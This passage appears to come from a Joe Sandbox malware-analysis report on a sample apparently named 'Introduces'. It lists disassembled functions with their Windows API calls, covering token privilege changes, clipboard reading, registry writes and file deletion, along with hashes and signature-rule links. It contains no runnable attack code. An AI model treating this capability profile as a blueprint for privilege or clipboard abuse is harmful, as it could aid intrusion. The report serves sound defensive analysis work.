ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A7D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A7D5BB
ReleaseCapture.USER32 ref: 00A7D5C6
GetCursorPos.USER32(?), ref: 00A7D600
ScreenToClient.USER32(?,?), ref: 00A7D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A7D669
SendMessageW.USER32 ref: 00A7D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A7D6D4
SendMessageW.USER32 ref: 00A7D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A7D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A7D733
GetCursorPos.USER32(?), ref: 00A7D753
ScreenToClient.USER32(?,?), ref: 00A7D760
GetParent.USER32(?), ref: 00A7D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A7D7E9
SendMessageW.USER32 ref: 00A7D81A
ClientToScreen.USER32(?,?), ref: 00A7D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A7D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A7D8D2
SendMessageW.USER32 ref: 00A7D8F5
ClientToScreen.USER32(?,?), ref: 00A7D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A7D97B

Part of subcall function 009F29AB: GetWindowLongW.USER32(?,000000EB), ref: 009F29BC

GetWindowLongW.USER32(?,000000F0), ref: 00A7DA17

Strings

@GUI_DRAGID, xrefs: 00A7D562
F, xrefs: 00A7D8FB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 5e6210c9f0fbe584d2c631a25e02415fb5cd1e690353b3e58d7dced222444433
Instruction ID: caa5ff9658946f7ab5bc86b05718e44734ba68c50a8325b4dac6d70cdd5878e0
Opcode Fuzzy Hash: 5e6210c9f0fbe584d2c631a25e02415fb5cd1e690353b3e58d7dced222444433
Instruction Fuzzy Hash: 27428B30205241AFD725DF68CC48FAABBF5FF88310F148619F699872A1D7B1E855CB92

Function 00A48F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00A49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A493E3
Part of subcall function 00A49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A49410
Part of subcall function 00A49399: GetLastError.KERNEL32 ref: 00A4941D

_memset.LIBCMT ref: 00A48F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A48FC3
CloseHandle.KERNEL32(?), ref: 00A48FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A48FEB
GetProcessWindowStation.USER32 ref: 00A49004
SetProcessWindowStation.USER32(00000000), ref: 00A4900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A49028

Part of subcall function 00A48DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A48F27), ref: 00A48DFE
Part of subcall function 00A48DE9: CloseHandle.KERNEL32(?,?,00A48F27), ref: 00A48E10

Strings

default, xrefs: 00A49023
, xrefs: 00A48F80
winsta0, xrefs: 00A48FE6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 6f6af429cec65c776209602296bccb187749a37b17ac44bcb20859ae45f06d14
Instruction ID: 4d5e262096c1a080867e521f96f66ef71360f1ce694ab98da7b694d94e5ba267
Opcode Fuzzy Hash: 6f6af429cec65c776209602296bccb187749a37b17ac44bcb20859ae45f06d14
Instruction Fuzzy Hash: A5815975900209BFDF51DFA8DD49EEF7B79AF48314F044229F914A6261D7318E29DB20

Function 00A64632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00A80980), ref: 00A6465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A6466A
GetClipboardData.USER32(0000000D), ref: 00A64672
CloseClipboard.USER32 ref: 00A6467E
GlobalLock.KERNEL32(00000000), ref: 00A6469A
CloseClipboard.USER32 ref: 00A646A4
GlobalUnlock.KERNEL32(00000000), ref: 00A646B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00A646C6
GetClipboardData.USER32(00000001), ref: 00A646CE
GlobalLock.KERNEL32(00000000), ref: 00A646DB
GlobalUnlock.KERNEL32(00000000), ref: 00A6470F
CloseClipboard.USER32 ref: 00A6481F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: e507608676bfe8bb9a78bb92fcc064bd7b756777e1765af681529b65d91a9f7f
Instruction ID: fbf5f80930c576da56a886c762ce6cf045946394e86bc1651db04d45dd8f78e4
Opcode Fuzzy Hash: e507608676bfe8bb9a78bb92fcc064bd7b756777e1765af681529b65d91a9f7f
Instruction Fuzzy Hash: 5051A475244205AFD341EFA0DD85FAE77B8AF88B50F004529F656D31E2EF70D9098B62

Function 00A5CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A5CDD0
FindClose.KERNEL32(00000000), ref: 00A5CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A5CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A5CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A5CE87
__swprintf.LIBCMT ref: 00A5CED3
__swprintf.LIBCMT ref: 00A5CF16

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

__swprintf.LIBCMT ref: 00A5CF6A

Part of subcall function 00A138C8: __woutput_l.LIBCMT ref: 00A13921

__swprintf.LIBCMT ref: 00A5CFB8

Part of subcall function 00A138C8: __flsbuf.LIBCMT ref: 00A13943
Part of subcall function 00A138C8: __flsbuf.LIBCMT ref: 00A1395B

__swprintf.LIBCMT ref: 00A5D007
__swprintf.LIBCMT ref: 00A5D056
__swprintf.LIBCMT ref: 00A5D0A5

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00A5CECD
%02d, xrefs: 00A5CF5E, 00A5CF68, 00A5CFB6, 00A5D005, 00A5D054, 00A5D0A3
%4d, xrefs: 00A5CF10

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: fcd8910454b94bb5d49687bfbe536684cdfc17d6b926d10bbfa5b3fc4a9c50f7
Instruction ID: daae248b167212d766006723371b1fb94eae3a0d536ba466a8505f721aa68300
Opcode Fuzzy Hash: fcd8910454b94bb5d49687bfbe536684cdfc17d6b926d10bbfa5b3fc4a9c50f7
Instruction Fuzzy Hash: 40A130B2404309ABD710EFA4DD85EAFB7ECFF94705F400919F69586191EB70EA08CB62

Function 00A5F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A5F5F9
_wcscmp.LIBCMT ref: 00A5F60E
_wcscmp.LIBCMT ref: 00A5F625
GetFileAttributesW.KERNEL32(?), ref: 00A5F637
SetFileAttributesW.KERNEL32(?,?), ref: 00A5F651
FindNextFileW.KERNEL32(00000000,?), ref: 00A5F669
FindClose.KERNEL32(00000000), ref: 00A5F674
FindFirstFileW.KERNEL32(*.*,?), ref: 00A5F690
_wcscmp.LIBCMT ref: 00A5F6B7
_wcscmp.LIBCMT ref: 00A5F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00A5F6E0
SetCurrentDirectoryW.KERNEL32(00AAB578), ref: 00A5F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5F708
FindClose.KERNEL32(00000000), ref: 00A5F715
FindClose.KERNEL32(00000000), ref: 00A5F727

Strings

*.*, xrefs: 00A5F68B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6351cab5ec17aa897c38b5e0dd56a257f7426f80bf747fafda5bd0eb63f808c1
Instruction ID: 0cbe2121d4c43920ab51c1970db25b4f27bd16059ce5036a1738b8e0bf28ddd4
Opcode Fuzzy Hash: 6351cab5ec17aa897c38b5e0dd56a257f7426f80bf747fafda5bd0eb63f808c1
Instruction Fuzzy Hash: DF316272941219AEDF50DBB49C4DEEE77ACBF09322F100565E945D31A0EB70DA89CB60

Function 00A70EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A70FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A80980,00000000,?,00000000,?,?), ref: 00A71021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A71069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A710F2
RegCloseKey.ADVAPI32(?), ref: 00A71412
RegCloseKey.ADVAPI32(00000000), ref: 00A7141F

Strings

REG_MULTI_SZ, xrefs: 00A711DA
REG_QWORD, xrefs: 00A71360
REG_EXPAND_SZ, xrefs: 00A7108F
REG_SZ, xrefs: 00A71130
REG_BINARY, xrefs: 00A713AD
REG_DWORD, xrefs: 00A712E3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: af1d48d305e75743e0c65afb5864d27b1bfce87f6c21fbff0860581849b940c2
Instruction ID: ee2e89b0a7dba5f9bcf54c7b8ed9319635dbcf2fa39241afa65bebb64446cbde
Opcode Fuzzy Hash: af1d48d305e75743e0c65afb5864d27b1bfce87f6c21fbff0860581849b940c2
Instruction Fuzzy Hash: FA0248752006159FCB14EF28C981E6AB7E5FF88714F04C95DF99A9B2A2CB34EC41CB91

Function 00A5F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A5F756
_wcscmp.LIBCMT ref: 00A5F76B
_wcscmp.LIBCMT ref: 00A5F782

Part of subcall function 00A54875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A54890

FindNextFileW.KERNEL32(00000000,?), ref: 00A5F7B1
FindClose.KERNEL32(00000000), ref: 00A5F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00A5F7D8
_wcscmp.LIBCMT ref: 00A5F7FF
_wcscmp.LIBCMT ref: 00A5F816
SetCurrentDirectoryW.KERNEL32(?), ref: 00A5F828
SetCurrentDirectoryW.KERNEL32(00AAB578), ref: 00A5F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5F850
FindClose.KERNEL32(00000000), ref: 00A5F85D
FindClose.KERNEL32(00000000), ref: 00A5F86F

Strings

*.*, xrefs: 00A5F7D3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 12fdc695168e67c781c00b345e6f18879436bb377c5d66141098cc8f0ece589a
Instruction ID: 1d644364ab12fadd42bb380e5a1cb0af393fe022181a2e03771741f4127f97be
Opcode Fuzzy Hash: 12fdc695168e67c781c00b345e6f18879436bb377c5d66141098cc8f0ece589a
Instruction Fuzzy Hash: 0A31847294121ABEDF10DFB49C48ADE77ACAF19322F100565ED54A21E1E770DA8D8B60

Function 00A488CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A48E3C
Part of subcall function 00A48E20: GetLastError.KERNEL32(?,00A48900,?,?,?), ref: 00A48E46
Part of subcall function 00A48E20: GetProcessHeap.KERNEL32(00000008,?,?,00A48900,?,?,?), ref: 00A48E55
Part of subcall function 00A48E20: HeapAlloc.KERNEL32(00000000,?,00A48900,?,?,?), ref: 00A48E5C
Part of subcall function 00A48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A48E73

Part of subcall function 00A48EBD: GetProcessHeap.KERNEL32(00000008,00A48916,00000000,00000000,?,00A48916,?), ref: 00A48EC9
Part of subcall function 00A48EBD: HeapAlloc.KERNEL32(00000000,?,00A48916,?), ref: 00A48ED0
Part of subcall function 00A48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A48916,?), ref: 00A48EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A48931
_memset.LIBCMT ref: 00A48946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A48965
GetLengthSid.ADVAPI32(?), ref: 00A48976
GetAce.ADVAPI32(?,00000000,?), ref: 00A489B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A489CF
GetLengthSid.ADVAPI32(?), ref: 00A489EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A489FB
HeapAlloc.KERNEL32(00000000), ref: 00A48A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A48A23
CopySid.ADVAPI32(00000000), ref: 00A48A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A48A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A48A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A48A95

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d89ba3eaa6c2c2de10fad463ecc8ed37e8b8e6643f07fc88cb6c9e94375a83a2
Instruction ID: 845e8974a3f3b9d3b9a9e1ca549e8b1f349a03aa3b4a96e5ce9c034db6c65f16
Opcode Fuzzy Hash: d89ba3eaa6c2c2de10fad463ecc8ed37e8b8e6643f07fc88cb6c9e94375a83a2
Instruction Fuzzy Hash: E9613979900209BFDF01DFA5EC49EAEBB79FF44304F14812AE915A7290DB799A05CB60

Function 00A70A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7040D,?,?), ref: 00A71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A70B0C

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A70BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A70C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A70E82
RegCloseKey.ADVAPI32(00000000), ref: 00A70E8F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: d056509ee40526ba0d22f28c4450b0909d1e3b04973fa6881a669f1c4ead4b71
Instruction ID: bc32a4c50b330536289755b414f324a711e276985bab44a10fe2c73d1adce276
Opcode Fuzzy Hash: d056509ee40526ba0d22f28c4450b0909d1e3b04973fa6881a669f1c4ead4b71
Instruction Fuzzy Hash: B2E13931204214AFCB14DF29C995E6ABBF9EF89714F04C96DF84ADB2A1DB30E905CB51

Function 00A5443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00A54451
__swprintf.LIBCMT ref: 00A5445E

Part of subcall function 00A138C8: __woutput_l.LIBCMT ref: 00A13921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00A54488
LoadResource.KERNEL32(?,00000000), ref: 00A54494
LockResource.KERNEL32(00000000), ref: 00A544A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00A544C1
LoadResource.KERNEL32(?,00000000), ref: 00A544D3
SizeofResource.KERNEL32(?,00000000), ref: 00A544E2
LockResource.KERNEL32(?), ref: 00A544EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A5454F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 757edca25052272db56f23b9693a2e42d982b14219e6732b0d7b47f6fd73fc4f
Instruction ID: fc361b7b75b209bb4be3f7ddf9620be1394b858d89ffa033214cbfdbcc83cd16
Opcode Fuzzy Hash: 757edca25052272db56f23b9693a2e42d982b14219e6732b0d7b47f6fd73fc4f
Instruction Fuzzy Hash: 6B316B7250121AABDB119FA0AD48EBB7BB8FB08346F004525FE1292161E774DA56CB60

Function 00A64830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A64857
EmptyClipboard.USER32 ref: 00A6485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00A64872
CloseClipboard.USER32 ref: 00A64911

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: afe326f165d8f91e10b9eb2d48e70127b9eb4be788778cc89e0e6379d17ce10b
Instruction ID: 5ce8e0e15ea797794af021878a98e43941dce30b099e30caf59b715c4c54fcef
Opcode Fuzzy Hash: afe326f165d8f91e10b9eb2d48e70127b9eb4be788778cc89e0e6379d17ce10b
Instruction Fuzzy Hash: 0F21A9352412109FD711EF64EC49F6E7BB8EF88711F018015FA06972B1DB70AD11CB54

Function 00A53CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A02A58,?,00008000), ref: 00A102A4

Part of subcall function 00A54FEC: GetFileAttributesW.KERNEL32(?,00A53BFE), ref: 00A54FED

FindFirstFileW.KERNEL32(?,?), ref: 00A53D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A53E3E
MoveFileW.KERNEL32(?,?), ref: 00A53E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A53E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A53E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A53EAC

Strings

\*.*, xrefs: 00A53D41, 00A53D4A, 00A53D5F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 158fe32708ba7bebf84d31cd749862f641b8ad3ec203a28a0b9f146692f223fb
Instruction ID: bcbe65284e7986534ebee760a6e09d08073635be091f5aed8f3ebab78ede6d7f
Opcode Fuzzy Hash: 158fe32708ba7bebf84d31cd749862f641b8ad3ec203a28a0b9f146692f223fb
Instruction Fuzzy Hash: 8C51703280114DAACF15EBE0DA92DEDB7B9AF54341F200165E842B7192EF716F0DCB60

Function 00A5FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A5FA83
FindClose.KERNEL32(00000000), ref: 00A5FB96

Part of subcall function 009F52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F52E6

Sleep.KERNEL32(0000000A), ref: 00A5FAB3
_wcscmp.LIBCMT ref: 00A5FAC7
_wcscmp.LIBCMT ref: 00A5FAE2
FindNextFileW.KERNEL32(?,?), ref: 00A5FB80

Strings

*.*, xrefs: 00A5FA68

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
